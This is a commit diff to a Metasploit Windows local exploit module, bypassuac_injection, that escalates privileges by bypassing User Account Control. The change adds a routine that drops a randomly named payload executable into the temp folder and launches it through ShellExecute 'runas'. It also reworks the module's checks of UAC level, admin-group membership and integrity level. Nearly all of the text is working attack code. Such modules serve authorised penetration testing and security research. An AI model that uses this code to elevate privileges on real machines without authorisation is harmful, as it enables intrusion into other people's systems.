Update bypassuac_injection inline with latest privs lib

modules/exploits/windows/local/bypassuac_injection.rb

@@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Exploit::EXE
-  include Post::Common
   include Post::File
   include Post::Windows::Priv
 
@@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
+  def runas_method
+    payload = generate_payload_exe
+    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    tmpdir = expand_path("%TEMP%")
+    tempexe = tmpdir + "\\" + payload_filename
+    write_file(tempexe, payload)
+    print_status("Uploading payload: #{tempexe}")
+    session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
+    print_status("Payload executed")
+  end
+
   def exploit
 
-    fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin?
+    fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
 
     #
     # Verify use against Vista+
@@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     if is_uac_enabled?
-      vprint_status "UAC is Enabled, checking level..."
+      print_status "UAC is Enabled, checking level..."
     else
-      fail_with(Exploit::Failure::NotVulnerable,
-        "UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate"
-      )
+      if is_in_admin_group?
+        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
+      else
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+      end
     end
 
     case get_uac_level
-    when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent
-      fail_with(Exploit::Failure::NotVulnerable,
-        "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
-      )
-    when UACDefault
-      print_good "UAC is set to Default"
-      vprint_status "BypassUAC can bypass this setting, continuing..."
-    when UACNoPrompt
-      fail_with(Exploit::Failure::NotVulnerable,
-        "UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate"
-      )
+      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+        fail_with(Exploit::Failure::NotVulnerable,
+                  "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+        )
+      when UAC_DEFAULT
+        print_good "UAC is set to Default"
+        print_good "BypassUAC can bypass this setting, continuing..."
+      when UAC_NO_PROMPT
+        print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
+        runas_method
+        return
     end
 
     # Check if you are an admin
@@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
       if admin_group
         print_good('Part of Administrators group! Continuing...')
       else
-        print_error('Not in admins group, cannot escalate with this module')
-        print_error('Exiting...')
-        return
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
       end
     end
 
-    if get_integrity_level == LowIntegrityLevel
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
       fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
     end